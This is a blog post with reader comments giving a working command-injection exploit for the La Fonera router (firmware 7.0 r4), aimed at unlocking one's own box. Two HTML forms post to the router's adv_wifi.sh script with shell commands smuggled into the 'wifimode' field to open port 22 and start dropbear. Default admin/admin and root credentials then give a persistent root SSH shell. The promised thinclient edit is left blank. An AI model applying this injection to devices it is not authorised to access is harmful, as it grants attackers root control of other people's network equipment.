The method presented here WORKS! (at least with the present firmware 7.0 r4)
How to hack the fonera?
To open SSH access and to prevent FON from executing code on your LA Fonera do the following: Safe the following code as "step1.html" on your harddisk:
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/adv_wifi.sh" enctype="multipart/form-data">
<input name="wifimode" value="/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>
And now safe this code as "step2.html" on your harddisk:
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/adv_wifi.sh" enctype="multipart/form-data">
<input name="wifimode" value="/etc/init.d/dropbear" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>
Now power on the "La Fonera" (there is no need to connect the fonera-box to the internet). Wait until you can see the WLAN-AP "MyPlace" and connect to it (use the serial number as WPA-key).
After successful connection open the html-pages "step1.html" and "step2.html" in your browser to see thefollowing:
Now click the SUBMIT-Button on the first webpage, authenticate with username "admin" and password "admin" (fonera-defaults!) and wait until the browser is ready (you will see some wired code and html - just ignore)
After this swith to the second webpage (page 02) and click on this SUBMIT-button.
Now you are ready to connect your LA FONERA via ssh. Connect with Putty (download here) via SSH (SSH 1) to IP 192.168.10.1 (La Fonera Router) and login with username "root" and password "admin" (default).
# mv /etc/init.d/dropbear /etc/init.d/S50dropbear
# vi /etc/firewall.user
[PRESS i]
PRESS "i" to edit the firewall settings by uncommenting the two lines at the SSH section, so it will look like this
Now safe your work by pressing "ESC" and typing ":wq" (write and quit) and pressing ENTER. Now you can reboot or type these:
# /etc/init.d/S50dropbear
# /etc/firewall.user
Last but not least you should prevent FON from executing code on your box
by doing the following within the script /bin/thinclient
:
vi /bin/thinclientIf you want to prevent La Fonera from executing that received code, you might want to change the final lines (at the end of the script "/bin/thinclient" to the following:
7 Kommentare:
There are more vulnerabilities in the webinterface of the La Fonera. Anyway, nice hack.
Yesss, and again it's BINGO ! Well done Mr. Bommel... I'm sure mr. Vasilevski will loose couple of nights sleep over this, the arrogant prick ! Centralised contol over web devices will never be tolerated by the masses. Now porting OpenWRT to the Fonera and again BINGO ! Thanks.
yes - really nice one. You do not need to add extra iptables ssh rules, as long you connect via eth. If you need an application, here's one: http://olsrexperiment.de/sven-ola/fonera/ (be sure to read the readme)...
cool!
please next time add an application that cancels the FON-home feature. Otherwise the router will be patched on the next day via software update :) nice one anyway! congrats
really good job ... thank you very much ... you make me an happy boy!
If you need extra packages on you la fonera, take a look at fon.rogue.be. I will make more packages available as they are requested.
really gud work.....keep it up...
www.ipmango.com
Kommentar veröffentlichen